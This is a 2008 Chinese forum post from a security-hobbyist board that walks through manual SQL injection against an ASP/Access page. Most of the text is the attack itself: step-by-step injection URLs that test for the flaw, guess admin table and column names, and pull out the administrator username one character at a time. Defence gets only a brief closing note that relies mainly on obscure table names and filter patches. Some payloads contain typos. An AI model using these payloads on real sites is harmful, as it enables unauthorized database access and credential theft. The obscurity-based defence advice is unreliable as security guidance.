【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 【原创】从手工注入看SQL防御 [打印本页]

作者: 平湖秋月 时间: 2008-8-28 14:23 标题: 【原创】从手工注入看SQL防御

大家都知道很多情况下我们在入侵时使用工具注入的时候工具猜解不出来表明和字段名，不知道大家有没有注意这是什么原因？/ U# j* M7 o$ Q6 v  M- c
我总结了下发现那是因为所有的工具都有一部自己的字典，这部字典包含了表名和字段名，如果说管理员吧表明和字段名改成了不在这不字典内哪么我们所使用的工具将永远无法猜解出字段名和表名。下面我将从分析手工注入出发一打造抵御SQL的注入防线。当然不要忘记了哦正的就是反的，反的就是正的。就看你怎么去理解了！！呵呵1 {$ |+ A4 O: ]
) H. b7 s% p% K3 ?
1 判断是否存在注入点
构造简单的判断条件来判断该页面是否存在注入点，例如要检测的页面：http://127.0.0.1/111/view.asp?id=198
(1)想要对站点进行手工注入就必须对浏览器进行设置，以保证手工注入时能够返回出错的信息，
步骤：右键单击浏览器----属性---高级---取消“显示有好的HTTP错误信息”的勾--------应用！
- W: n; y, k& x* p
（2）像浏览器提交如下url：http://127.0.0.1/111/view.asp?id=198 and 1=1 如果存在SQL注入漏洞，就可以查询数据库。5 A; Y- |* P3 u
这里1=1是一个恒等式，可以忽略，因此会返回一个正常的页面，此页面和http://127.0.0.1/111/view.asp?id=198一样，这时便可以判断此站有希望被注入，如果返回的是一些错误的信息，哪么一些初级的入侵者可能会放弃这个站点
+ G2 {3 t  s- {2 i4 `4 {- [
（3）进一步像浏览器提交如下URL：http://127.0.0.1/111/view.asp?id=198 and 1=2    这里1=2是一个恒不等式。) l* d* O$ s0 f% `
如果站点支持数据库查询，大概会返回一个这样的提示：1 e! \9 a+ M9 Z. Z& {' j, |
microsoft VBScript 编辑器错误错误’800a03f6'
缺少'End'
/iisHelp/common/500-100.asp,行242
ADODB.Field 错误'800a0bcd'
BOF或 EOF 中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。3 r9 p% K. X8 }! h) w0 z! x# I
/111/view.asp.  行50) b2 y6 e! l: g5 m8 Y
: U) P6 N  f; g5 \
一般出现这个信息我们就能够基本确定这个站能够进行SQL的注入了。( Z9 L1 _1 H9 t, x2 w- V
0 D9 z5 A0 |1 |) a  y# ^  P! r
不过很多的时候我们只需要用一个单引号就可以快速的判断出目标站点是否存在SQL的注入，向浏览器提交如下url: http://127.0.0.1/111/view.asp?id=198'1 J+ [; E/ {  N* `

如果返回的如下信息就说明有一半以上的几率存在注入漏洞：
Microsoft OLE DB Provider for ODBC Drivers错误’80040e14’
[Microsoft] [OBDC
Microsoft Ac-cess Driver]字符串的语法错误在查询表达式’id=1’中。
# m/ o5 Z" S- k! f* c6 i! X

（4）此时我们开始构造特殊的SQL查询语句来查询站点数据库的表名，向url提交如下语句：
http://127.0.0.1/111/view.asp?id=198 and exists(select from *admin)4 j! Q0 v8 ]3 U0 H6 e8 c1 i3 Y

这个语句是向数据库查询是否存在admin这个表，如果存在就会返回正常页面，不存在就会返回出现错误的页面，一般我们都会先测试常用的表名当然这也是一般的注入工具密码字典内存在的表名和字段名，如果表名不存在的常用的表明中，哪么我们就用社会工程学来猜解表名，当然这样的情况下猜中表名的概率也是很低的。, m' Z+ T7 `# d

（5）在得到表名后开始构造查询语句查询数据库字段名，想url提交如下语句：
http://127.0.0.1/111/view.asp?id=198 and exists(select user from admin)
& ]( J- U% y8 }: {+ ]$ u% h4 y
这个语句是向数据库中admin表中查询师傅存在user字段，存在的话返回正常页面，附则反之
3 ^3 S5 Z% `! O* w6 U
（6）接下来确定字段id值，语句：, l. T4 j' L' H
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin  where id=1)

正确返回正常页面不存在的话返回出错页面; F6 q9 a* D; A6 O8 ~

1 U5 J) Y2 ^9 `8 P+ p
（7）在表名和字段名猜测出来以后，我们开始向url提交查询语句猜测管理员账号的长度
http://127.0.0.1/111/view.asp?id=198 and exists(select id from admin where len(ueer),<6 and id=1)7 T- O* d1 K9 n) T
( m+ X3 j8 ^9 J
这个语句是查询user字段中用户名长度的范围，表示长度小于6    同样的正确返回正常页面，错误的话返回出错页面, q6 v. R$ o' C
缩小范围，然后构造下面的语句确定用户名的具体长度：9 V# L% N8 H; d  w7 ]1 V, z% T
http://127.0.0.1/111/view.asp?id=198 and exists(select  id from admin where len(user)=5 and id=1)

这里也是正确返回正常页面错误返回出错页面" E. }, y, R* z3 @1 L! @( S1 \0 w8 H
' U( \  o7 t! h+ a, R" j5 _
（8）最后我们开始进入最后的环节查询管理员用户名，像url提交构造的查询语句：8 _1 s$ U8 p0 H# h5 I# P3 A5 x
http://127.0.0.1/111/view.asp?id=198 and exists(select count(*)from admin  where left(user,1)='a')2 }  x: e- b* c

这个语句是从用户名左边开始猜测用户名第一位为a，正确就会返回正常页面，错误返回出错页面，一位一位的猜，到第二位的时候修改语句为（user,2）='ad' 后面依次类推。
* H' e# h( ?' G% @* B1 ~) k; z
这样当我们得到了用户名密码以后，此次的注入也就接近尾声了！！！！！1 \2 v" F/ s5 A+ C" m/ S

* ~0 ^7 k0 X) }3 z

这里再补上防范的方法吧：
实际上很简单，从这个过程来看如果表名和字段名不在常用的表名和字段名里面，那么我们一般都会采取使用社会工程学了猜解，如果说管理员修改的表名和字段名足够复杂的话那我们很难达到目的。
当然简单的方法还有很多比如去下载防止注入的补丁程序打上这种方法是修改站点文件，增加过滤语句来过滤入侵者提交的语句以达到防注入的目的，这个小质的一篇帖子已经说道了
6 v# W4 R: A5 Y) G% j) z& j
好了就这些

辛辛苦苦敲了半天的键盘真累啊
# t% Q2 `6 u; P$ E
【】+ [5 s" A( C" o
8 `" `9 j8 s1 D9 y
[ 本帖最后由平湖秋月于 2008-8-28 15:19 编辑 ]

作者: 3ast 时间: 2008-8-28 16:02

辛苦了，一篇不错的总结

作者: 柔肠寸断 时间: 2008-8-28 19:05

不错* H5 T9 B9 u/ G) f! H7 J0 z
4 x/ u3 v- {: N* T9 T |$ Q
但是文章应该说说防御方面啊~~~

欢迎光临【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)